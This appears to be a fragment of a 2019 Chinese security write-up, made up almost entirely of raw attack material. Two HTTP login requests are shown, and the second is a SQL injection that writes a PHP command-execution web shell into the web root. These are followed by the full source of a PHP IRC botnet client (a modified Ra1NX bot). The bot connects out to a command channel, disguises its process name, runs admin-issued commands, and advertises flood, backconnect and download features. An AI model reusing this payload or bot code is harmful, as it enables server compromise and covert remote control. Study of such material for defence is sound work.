POST /index.php?page=login HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded Content-Length: 17 Connection: close Upgrade-Insecure-Requests: 1 user=1&password=1
POST /index.php?page=login HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded Content-Length: 17 Connection: close Upgrade-Insecure-Requests: 1 user=1' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#&password=1
$ cat /var/www/botsources/botcode.php.txt <?php /* Modified version of the Ra1NX bot by bwall. The purpose of this version is for research. Attack functionality has been removed. It should be fairly easy to run on your own IRCd to run test attacks against it. Don't do anything stupid with this. ~ Think Evil, Do Good. ~ */ error_reporting(0); set_time_limit(0); $servers = ""; $ports = "6667"; $admins = ""; $channels = "#somechannel"; $realnames = "jhl"; $nicknames = "jhl1,jhl2,jhl3,jhl4,jhl5,jhl6,jhl7,jhl8,jhl9,jhl10,jhl11,jhl12,jhl13,jhl14,jhl15,jhl16,jhl17,jhl18,jhl19,jhl20,jhl21,jhl22,jhl23,jhl24,jhl25,jhl26,jhl27,jhl28,jhl29,jhl30"; $chanpass = "trolol"; #create daemon process $process = " /usr/sbin/httpd, /sbin/klog, /usr/bin/mysql, /sbin/syslogd, /sbin/syslogd, /sbin/klogd -c 1 -x -x, /usr/sbin/acpid, /usr/sbin/cron "; $ident = random($nickames); $nick = random($nicknames); $realname = random($realnames); $server = random($servers); $port = random($ports); $daemon = random($process); $linas_max = 2; $sleep = 3; $maxtryconn = 5; $maxnumber = 6; $nick = "jhl"; $daemon = "/usr/tes"; $version = "bwall's modified RA1NX bot(safe)"; define(_,"2-*=**!"); chdir("/tmp"); $shellfunc = "system"; ########### ENTER COMMAND / COMMAND SENDER ####### function SEND($data) { global $SOCKET; print("OUT >>> ".$data."\n"); fwrite($SOCKET,$data."\r\n"); } ################### MAIN CONNECTION ##################### function connection(){ global $maxtryconn,$idents,$nicknames,$realnames,$servers,$ports; $try=1; $SOCKET = false; while(!$SOCKET && ($try <= $maxtryconn)){ $server = random($servers); $port = random($ports); $SOCKET = fsockopen($server,$port,$err_num,$err_msg,30); $GLOBALS['SOCKET']=$SOCKET; $try++; sleep(1); } if(!$SOCKET) die("Cannot connect to remote host"); if ($SOCKET){ $GLOBALS['ident'] = $ident = random($nicknames); $GLOBALS['nick'] = $nick = random($nicknames); $GLOBALS['realname']= $realname = random($realnames); SEND("USER XRay localhost : -==Ra1NX Projection==-"); NICK($nick); print "Connected to ".$server.":".$port." ".$nick." (XRay@".gethostbyname($_SERVER["HTTP_HOST"]).") Ra1NX Projection\r\n"; flush();sleep(1); } } do{ ##### connect to server ###### if(!$SOCKET){connection();} ######## connected! get sock output ######### $text = fgets($SOCKET,1024); $text = str_replace("\r","",$text); $text = str_replace("\n","",$text); $text = $text." "; parser($text); $text = false; $lines = false; }while(1); ### GLOBAL FUNCTIONS function parser($line){ global $chanpass,$nick,$maxnumber,$channels,$SOCKET,$version,$admins; $called = $sline = $iduser = $huser = $user = $useriD = $userHost = $typeMsg = $dropMsg = $adm = $cmd = $arg = false; $sline = $line; $line = explode(" ",$line); $iduser = explode("@",$line[0]); $huser = explode("!",$iduser[0]); $user = substr($huser[0],1,strlen($huser[0])); $userId = $huser[1]; $userHost = $iduser[1]; $typeMsg = $line[1]; $dropMsg = ($line[2]==$nick)?$user:$line[2]; $called = (substr($line[3],1,strlen($line[3]))=="!cmd")?true:((substr($line[3],1,strlen($line[3]))==$nick)?true:false); $pubcalled = (substr($line[3],1,strlen($line[3]))=="!bot")?true:false; $cmd = (substr($line[4],0,1)=="@")?substr($line[4],1,strlen($line[4])):'shell'; $pubcmd = (substr($line[4],0,1)=="@")?substr($line[4],1,strlen($line[4])):false; if($line[5]){ for($i=5;$i<count($line);$i++){ $arg .= $line[$i].(($i<(count($line)-1))?" ":""); } } $GLOBALS['dropMsg'] = $dropMsg; $GLOBALS['arg'] = $arg; $GLOBALS['user'] = $user; if(substr($sline,0,6)=="PING :") SEND("PONG :".substr($sline,6)); if(eregi("VERSION",$line[3])) SEND("PRIVMSG ".$user." VERSION reply: ".$version.""); print("IN >>> ".$sline."\n"); if($typeMsg!="PRIVMSG"){ switch($typeMsg){ case "433": nick($nick.rand(0,$maxnumber)); break; case "001": sleep(1); foreach (beArray($channels) as $key => $chan) { SEND("JOIN $chan $chanpass"); } break; case "JOIN": sleep(1); SEND("MODE $channels +k $chanpass"); break; } } if(substr($line[3],1,strlen($line[3]))==$nick){ $called = true; } if($called){ if($cmd=="shell") { $arg = $line[4]." ".$arg; } $cmd = ($cmd=="join")?"joins":$cmd; if ($typeMsg=="PRIVMSG" && admin($user) && $called && $cmd) { if(function_exists($cmd)){ $sender = "PRIVMSG ".$dropMsg." "._; $GLOBALS['sender'] = $sender; $arg = str_replace("\r","",$arg); $arg = str_replace("\n","",$arg); $cmd($arg); } } } if(substr($line[3],1,strlen($line[3]))==$nick){ $pubcalled = true; } if($pubcalled){ if ($typeMsg=="PRIVMSG" && $user && $pubcalled && $pubcmd) { if(function_exists($pubcmd)){ $sender = "PRIVMSG ".$dropMsg." "._; $GLOBALS['sender'] = $sender; $arg = str_replace("\r","",$arg); $arg = str_replace("\n","",$arg); $pubcmd($arg); } } } } ####[ Ra1NX Authentication ]#### function admin($user){ global $admins, $SOCKET; $userinfo = false; if(!in_array($user,beArray($admins))) return false; return true; } #####[ Ra1NX IRC Commands ]##### function nick($newnick) { global $nick, $dropMsg; $newnick = str_replace("\r","",$newnick); $newnick = str_replace("\n","",$newnick); if(!$newnick){return;} SEND("NICK ".$newnick); $GLOBALS['nick']=$newnick; } function PRIVMSG($msg){ $dropMsg; SEND("PRIVMSG ".$dropMsg." ".$msg); } function joins($arg){ $chan = explode(" ",$arg); for($i=1;$i<count($chan);$i++){ $msg .= $chan[$i]." "; } SEND("JOIN #".str_replace("#","",$chan[0])); SEND("PRIVMSG #".str_replace("#","",$chan[0])." ".$msg); } function part($arg){ $part = explode(" ",$arg); $chan = $part[0]; for($i=1;$i<count($part);$i++){ $msg .= $part[$i].(($i<(count($part)-1))?" ":""); } SEND("PART #".str_replace("#","",$chan)." ".$msg); } function msg($args){ $arg = explode(" ",$args); $obyek = $arg[0]; for($i=1;$i<count($arg);$i++){ $msg .= $arg[$i]." "; } SEND("PRIVMSG ".$obyek." ".$msg); } function off($arg=''){ if($arg==" ") $arg=false; $arg = (!$arg)?"15,1 The only thing that appears in my head Just to 4S8.4U8.4I8.4C8.4I8.4D8.4E15 away ":$arg; SEND("QUIT :".$arg); } function ison($arg){ global $dropMsg,$SOCKET,$nick; SEND("ISON ".$arg); while(!$complete){ $useron = fgets($SOCKET,128); $complete = (eregi("303 ".$nick." :",$useron))?1:0; } $ison = (eregi("303 ".$nick." :".$arg,$useron))?1:0; return $ison; } function mode_n($chan){ SEND("PRIVMSG ".$chan." "); $mode = fgets($SOCKET,2500); return (eregi($chan." No external channel messages",$mode))?1:0; } function cycle($arg){ part($arg); joins($arg); } function safemode(){ if(@ini_get("safe_mode")) return false; if(eregi("on",@ini_get("safe_mode"))) return false; return true; // safemode is OFF } ####[ Ra1NX Port ]#### function port($arg){ global $SOCKET,$sender; $args = explode(" ",$arg); $host = $args[0]; $port = $args[1]; $pesan = checkport($host,$port,2); $pesan = "is ".(eregi("failed",$pesan)?$pesan:"Accepted"); SEND($sender."7Connection to ".$host.":".$port." ".$pesan); } ###[ Ra1NX Command Help ]### function help($arg){ global $SOCKET,$sender; $args = explode(" ",$arg); $opt = $args[0]; $tmpl = $sender."10@"; $hfile[]= 'irc: join #channel msg'; $hfile[]= 'irc: part #channel msg'; $hfile[]= 'irc: cycle #channel msg'; $hfile[]= 'irc: msg nick/#channel msg'; $hfile[]= 'irc: whois nick'; $hfile[]= 'irc: find nick'; $hfile[]= 'irc: nick newnick'; $hfile[]= 'irc: off msg'; $hfile[]= 'flood: tsunami nick/#channel'; $hfile[]= 'flood: ctcpflood nick/#channel'; $hfile[]= 'shell: shell command'; $hfile[]= 'shell: download url'; $hfile[]= 'domaintool: ipwhois hostname'; $hfile[]= 'domaintool: reverse hostname'; $hfile[]= 'domaintool: iptrace hostname'; $hfile[]= 'domaintool: port hostname port'; $hfile[]= 'domaintool: nmap hostname'; $hfile[]= 'domaintool: proxy'; $hfile[]= 'ddos: udpflood target packetsize times'; $hfile[]= 'ddos: tcpflood target port packetsize times'; $hfile[]= 'ddos: httpflood target packetsize times'; $hfile[]= 'ddos: pingflood target times'; $hfile[]= 'ddos: apacheflood target times'; $hfile[]= 'ddos: synflood target packetsize times'; $hfile[]= 'ddos: superdos target port'; $hfile[]= 'rconnect: backconnect ip port {perl|c|nc|php}'; $hfile[]= 'rconnect: bindshell port {perl|nc|php}'; $hfile[]= 'info: info'; $hfile[]= 'info: myself'; $hfile[]= 'info: myip'; $hfile[]= 'info: myshell'; if(!$opt){SEND($sender."2Ra1NX v2.0 Command Help");} foreach($hfile as $key => $val){ $send = true; if($opt!=""){ $send = (eregi($opt.":",$val))?true:false; } if($send){ SEND(((eregi("shell command",$val))?$sender."10":$tmpl).substr($val,(strpos($val,": ")+2),strlen($val))); } } if(!$opt){SEND($tmpl."help {irc|flood|ddos|domaintool|rconnect|shell|info}");} } ###[ Ra1NX AddOns ]### function beArray($val,$param=','){ $val = str_replace("\r","",$val); $val = str_replace("\n","",$val); $val = str_replace("\t","",$val); $val = str_replace(" ","",$val); return explode($param,$val); } function random($var){ $var = beArray($var); $max = count($var)-1; $key = rand("0",$max); $output = str_replace(" ","",$var[$key]); $output = str_replace("\r","",$output); $output = str_replace("\n","",$output); $output = str_replace("\t","",$output); return $output; } ?>
来源:freebuf.com 2019-08-03 22:25:51 by: 陌度
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